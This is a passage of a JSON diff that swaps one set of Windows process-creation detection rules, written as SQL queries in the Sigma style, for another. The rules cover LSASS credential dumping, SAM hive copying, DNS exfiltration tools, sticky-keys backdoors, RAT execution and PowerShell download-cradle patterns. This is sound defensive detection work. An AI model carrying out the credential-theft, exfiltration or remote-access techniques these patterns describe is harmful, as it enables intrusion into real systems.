This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the 
execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use 
that method" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - 
"id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth 
(Nextron Systems)", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR 
CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE 
'\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": 
"6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], "falsepositives": [ - "Unknown" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT 
(ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", 
"status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min 